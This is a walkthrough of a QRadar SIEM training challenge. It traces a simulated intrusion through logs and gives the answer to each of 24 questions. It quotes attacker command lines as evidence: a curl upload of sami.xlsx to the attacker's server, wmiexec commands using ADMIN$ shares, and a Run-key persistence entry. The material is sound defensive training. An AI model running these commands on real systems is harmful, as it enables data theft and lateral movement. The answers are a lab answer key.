The Walkthrough

Q1) How many log sources available?

Steps:

1. Navigate to the Admin tab.

2. Select Log Sources.

Answer: 15

Q2) What is the IDS software used to monitor the network?

Looking at the log sources again we’ll find that the IDS (Intrusion Detection System) software used to monitor the network in this environment is : Answer: Suricata.

Q3) What is the domain name used in the network?

Search Windows Authentication Logs

Go to Log Activity in QRadar.
Use filters or search for logs with:
- Event Name: "Logon"
- Or Event ID: 4624 (Successful Logon) and open any log you fine.
Look at fields such as:
- Account Domain
- TargetDomainName
- DomainName

These fields usually contain the domain name used in the environment.

🕒 Note: The Start Time for the logs is 1/1/2020, so make sure to set the time range accordingly when searching Answer: HACKDEFEND.local

Q4) Multiple IPs were communicating with the malicious server. One of them ends with "20". Provide the full IP.

· I went to Log Activity in QRadar.

· Changed the display columns to show Source IP.

· Filtered logs for communications with the malicious server.

· From the list of source IPs, I looked for the one ending with "20".

Answer: 192.168.20.2

Q5) What is the SID of the most frequent alert rule in the dataset?

· I searched logs by Rule SID in QRadar.

· Sorted or filtered to find the most frequent SID triggered in the dataset.

Answer: 2027865

Q6) What is the attacker's IP address?

I found this IP in the offense titled:

"Excessive Firewall Denies Between Hosts"

This offense means that one host (192.20.80.25) tried to connect to many internal systems, but all those attempts were denied by the firewall.

Important Notes:

Evidence

Explanation

Source IP

It's the initiator of the offense. This means 192.20.80.25 attempted to connect to many hosts but got blocked.

Firewall Denies

The connections were denied by firewall rules → typical of scanning or probing attempts.

Multiple Targets

It's categorized as “Between Hosts” → meaning it likely tried several destinations.

No Specific User

User field = N/A → suggests automation (e.g., script/tool), not a legit login attempt.

Magnitude

Medium → serious enough to be flagged as a potential threat.

ANSWER: 192.20.80.25

Q7) The attacker was searching for data belonging to one of the company's projects, can you find the name of the project?

Step 1: Initial IP-Based Search

I started by filtering logs related to the attacker’s IP address 192.20.80.25 to find any activity linked to the project name.
Result: No relevant logs were found linked directly to this IP.

Step 2: Searching for File Access Commands

To dig deeper, I searched for PowerShell commands that list or search files using the filter:

Payload Matches Regular Expression: Get-ChildItem

· Get-ChildItem is a PowerShell command used to list files and folders (like `dir` in Windows).

Step 3: Analyzing the Results

The logs showed the following command being run: value="C:\Users\nour.HACKDEFEND" ParameterBinding(Get-ChildItem): name="Filter"; value="project48"
This indicates the user was searching inside the folder C:\Users\nour.HACKDEFEND for files or folders matching the name project48.

Step 4: The project name

From the PowerShell command filter, I identified that project48 is the project name the attacker was searching for.
This was not directly linked to the attacker IP in the logs but was found through their actions on the compromised user account.

ANSWER: project48

Q8) What is the IP address of the first infected machine?

Step 1: Filter Logs by Attacker’s IP

I applied a filter in QRadar to show all logs related to the attacker's IP:

Step 2: Sort Logs by Time

I sorted the logs in ascending order (from oldest to newest) to identify the earliest interaction.

Step 3: Analyze the First Connection

The first internal IP that communicated with the attacker was: 192.168.10.15

ANSWER: 192.168.10.15

Q9) What is the username of the infected employee using 192.168.10.15?

Step 1: Filter Logs in Qradar

· I applied the following filters in the Log Activity tab:

o Source IP = 192.168.10.15

o EventID (custom) = 4624

Step 2: Analyze the Logon Event

Event ID 4624 represents a successful logon in Windows.
The log showed that the user who logged in from this IP is: nour

ANSWER: nour

Q10) Hackers do not like logging, what logging was the attacker checking to see if enabled?

1. Filtered QRadar logs where:

o Payload Contains is Microsoft-Windows-PowerShell/Operational

o Username is any of nour

2. I reviewed all the resulting logs for signs of the attacker checking logging status (e.g., using Get-WinEvent, wevtutil, or similar commands).

3. I found multiple logs showing:

o PowerShell command executions

o Log source: Microsoft-Windows-PowerShell/Operational

o Username: nour

o Source IP: 192.168.10.15

The Result:

Although there were no specific commands confirming the attacker explicitly checked logging settings (e.g., Get-WinEvent -LogName), the presence of logs from the Microsoft-Windows-PowerShell/Operational channel confirms that PowerShell logging was enabled, and the attacker’s activity was being recorded.

So, while we cannot confirm the attacker checked the log status, we do know:

The attacker's actions were captured in the Operational PowerShell log.

ANSWER: PowerShell

Q11) Name of the second system the attacker targeted to cover up the employee?

I filtered logs using:

EventID is any of 4624 (Successful logon events)

we got this :

1. Review the log entries related to the attacker’s activity.

2. Check the Computer field and Logon Type in “the Payload itself”:

3. The log from HD-FIN-02 shows Logon Type 5, which is a service or system logon — usually normal and not related to attacker lateral movement.

4. The log from MGNT-01 shows Logon Type 3, which means a network logon, indicating a remote connection likely used by the attacker to move laterally.

5. Because of this, MGNT-01 is identified as the second system the attacker targeted to cover up the infected employee.

ANSWER: MGNT-01

Q12) When was the first malicious connection to the domain controller (log start time - hh:mm:ss)?

I filtered the logs using these :

Event ID 3 in Sysmon = Network Connection Detected. And I got this result after sorting by time:

Now we should look into the first log to see the payload information, here it is :

And what happened here is:

· a network connection was initiated by Notepad.exe and detected where the process C:\Windows\SysWOW64\notepad.exe initiated an outbound TCP connection to 192.168.20.20 on port 389 (LDAP).

· The target port is 389 (LDAP), commonly used for querying Active Directory – a behavior typical of reconnaissance or credential access techniques.

So, ANSWER: 11:14:10

Q13) What is the md5 hash of the malicious file?

Filters Used in QRadar:

Source IP = 192.168.10.15
Payload Contains = hash

What I Found:

A FileCreateStreamHash event from host HD-FIN-03
Opened the log and found the MD5 hash

ANSWER: 9D08221599FCD9D35D11F9CBD6A0DEA3

Q14) What is the MITRE persistence technique ID used by the attacker?

What I Did:

· I applied the filter Payload Contains HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run to focus on registry events related to the Run key in the Windows registry, which is often used for persistence.

· I also filtered EventID to 13, which corresponds to Registry Value Set events in Sysmon logs, showing changes or creation of registry values.

· Combining these filters helped me find registry modifications where the attacker set a value under the Run key, indicating attempts to maintain persistence.

· A suspicious registry key created by powershell.exe that sets a value under this Run key pointing to a malicious script C:\Windows\TEMP\PjvQTe.vbs.

· This registry path is a common persistence mechanism that runs the specified program every time the system or user logs in.

Event Type: Registry value set

HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\SsGHOMcjsj

This is a Run key being created — it makes programs run automatically on system startup → persistence mechanism.

Process Used:

Image: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

Using PowerShell to modify the registry is suspicious, especially when writing to the Run key.

Value Set (Payload):

Details: C:\Windows\TEMP\PjvQTe.vbs

This means: PowerShell added a script (PjvQTe.vbs) to run every time the system starts. This .vbs file is likely part of a malware loader or script used by the attacker.

MITRE Technique Used:

Technique Name: Registry Run Keys / Startup Folder
Technique ID: T1547.001
MITRE Tactic: Persistence

Why This Matters:

This technique allows the attacker’s malware to automatically start on each boot or logon, ensuring persistent access to the compromised system.

ANSWER: T1547.001

Q15) What protocol is used to perform host discovery?

You look for ICMP first because it’s the most common, lightweight, and early indicator of host discovery — like the attacker knocking on doors to see who’s home.

What I Did:

Step 1: Think about scanning protocols

Attackers often use protocols like:
- ICMP (ping)
- TCP SYN scans
- UDP scans
- Sometimes even ARP (on the local network)

Step 2: Focus on the first compromised machine

From earlier analysis, we know the first compromised machine is 192.168.10.15.

Step 3: Explore network logs from this IP

In QRadar, I filtered:
- Log Source = Zeek (because it logs low-level protocol activity)
- Source IP = 192.168.10.15
- Protocol ≠ TCP/UDP → This helps isolate ICMP or other layer 3 traffic
Open any log :

ANSWER: ICMP

Q16) What is the email service used by the COMPANY? (one word)

· Since you want to identify the email service, looking at DNS activity is important.

· Zeek’s DNS logs give you exact queries for MX records or mail-related domain lookups.

· Other log sources might not capture DNS at this level of detail or may only show partial information.

Step 1: Apply Filters to Logs

Filter the Zeek connection logs with the following criteria:
- Destination port is 53 (DNS traffic)
- Source IP is within the subnet 192.168.20.0/24 (internal network)
- Log source is Zeek_conn

Step 2: Review Filtered Logs

Analyze the filtered DNS query logs to identify external destination IP addresses frequently contacted by internal hosts.
The logs show multiple queries to IPs such as:
- 13.107.24.3
- 13.107.24.4
- 13.107.160.4
- 13.107.252.10
- 40.90.4.205
- 64.4.48.201
- 64.4.48.205
- 40.90.4.2

Step 3: Research IP Address Ownership

Looked up the IP address 13.107.24.4 on an IP information service (e.g., ipinfo.io) to determine its owner and associated service.
The lookup confirmed that this IP belongs to Microsoft and is linked to office365 services.

The IPs belong to Microsoft’s cloud hosting Office365 email service.

ANSWER: office365

Q17) What is the name of the malicious file used for the initial infection?

· Apply these filters:

· Source IP is 192.168.10.15 → the infected machine.

· Payload Contains is hash → to find logs mentioning hashes.

· Payload Contains is targetfilename → to find logs that mention the name of the file.

Review the matching logs:

Look for a log that includes:

A file name (usually after targetFilename=)

ANSWER: important_instructions.docx

Q18) What is the name of the new account added by the attacker?

Based on this filter:

EventID = 4720 → means “A user account was created”

And we found:

Account Name: rambo

ANSWER: Rambo

Q19) What is the PID of the process that performed injection?

Applied the following filter:

EventID = 8 (This Sysmon Event ID 8, which logs CreateRemoteThread activity – typically used in process injection.)

From the log:

SourceProcessId is the process performing the injection.
TargetProcessId is the process being injected into.

ANSWER: 7384

Q20) What is the name of the tool used for lateral movement?

QRadar filters are:

cmd in CommandLine ➜ attacker used Command Prompt.
ADMIN$ in CommandLine ➜ attacker accessed a hidden admin share (common in lateral movement).
EventID = 1 ➜ you're seeing new process creations (from Sysmon).

ð This helps detect lateral movement using CMD and ADMIN$ share.

I got this result:

· I noticed this command in the Sysmon logs:

o cmd.exe /Q /c dir 1> \\127.0.0.1\ADMIN$...

· To investigate further, I googled this: cmd.exe /Q /c dir 1> \127.0.0.1\ADMIN$

· One of the top results was a page from 🔗 the SwisskyRepo GitHub project:

· Within the GitHub page, a section under "WMIExec" provided the following detail:

“By default this command is executed: cmd.exe /Q /c cd 1> \127.0.0.1\ADMIN$__RANDOM 2>&1”

This pattern matches the original Sysmon log almost exactly, strongly suggesting the use of wmiexec.py from the Impacket toolkit.

Each displayed command-line executions similar to: cmd.exe /Q /c whoami 1> \127.0.0.1\ADMIN$__1604913874.5822518 2>&1 cmd.exe /Q /c reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging 1> \127.0.0.1\ADMIN$__1604913874.5822518 2>&1

These logs confirmed consistent WMIExec-like behavior across the network.

ð Conclusion

Based on the evidence collected:

· The command-line structure is consistent with wmiexec.py.

· Redirection to the ADMIN$ share is a strong indicator of this tool.

· GitHub documentation confirms the behavior.

ANSWER: wmiexec.py

Q21) Attacker exfiltrated one file, what is the name of the tool used for exfiltration?

Filtered Logs

Used filter: payload contains is curl

Got This:

Found Evidence:

Matching command line: cmd.exe /Q /c curl -X PUT --upload-file sami.xlsx http://192.20.80.25:8000 1> \\127.0.0.1\ADMIN$\__1604917392.4554174 2>&1

This command shows an HTTP PUT request using curl to upload the file sami.xlsx to an external server.

ANSWER: curl

Q22) Who is the other legitimate domain admin other than the administrator?

Steps:

Filter applied:
- Username is not N/A
- Username is not any of [sarah, nour, admin, Administrator]
Extracted relevant events:

Looked for specific event:
- I looked for the event "Successful logon with administrative or special privileges".
Result found:
- This event appeared 4 times related to the user Adam.

ANSWER: Adam

Q23) The attacker used the host discovery technique to know how many hosts available in a certain network, what is the network the hacker scanned from the host IP 1 to 30?

Filters Used in QRadar:

Source IP = 192.168.10.15
Payload Contains = icmp
Log Source = Zeek_conn

What I Found:

Multiple ICMP connections from 192.168.10.15 to IPs in the range 192.168.20.1 to 192.168.20.30.
This shows scanning activity across this subnet

ANSWER: 192.168.20.0

Q24) What is the name of the employee who hired the attacker?

Filter by IP address :

Filter events where Source or Destination IP is 192.20.80.25 (the suspicious external server)
Exclude internal IPs that are not 192.168.10.15 or 192.168.20.20 (to focus on other internal hosts interacting with the external IP)
⚠️ NOTICE:
- 192.168.10.15 => First infected machine
- 192.168.20.20 => The Domain Controller

Sort the filtered events by Time

Sort events ascending or descending by timestamp to see activity in order

Identify relevant events

Look for events like Zeek_HTTP, NIDS Alert (SO-Suricata), or Zeek_conn that show communication between internal Ip that we found 192.168.10.29 and 192.20.80.25.

Inspect payload or detailed log info

Enter the first event in the list
Look at the payload or log message for clues such as file names, commands, or usernames
This log shows an HTTP PUT of file sami.xlsx from IP 192.168.10.29 to 192.20.80.25
The filename sami.xlsx indicates the employee's name is Sami

We can get the employee’s name from question #21, by the way 😉

ANSWER: Sami

Conclusion ⚡️

In this QRadar101 guide, we learned how to use QRadar step-by-step to find important security events. By filtering and sorting events, we tracked suspicious activity and even found the employee linked to the attacker — Sami. These simple but powerful skills are the building blocks for anyone wanting to become a great security analyst. Keep practicing, and you’ll get faster and smarter at spotting threats and protecting your organization.

PreviousScenario and Instructions Next🎨 Frontend Development Projects

Last updated 2 months ago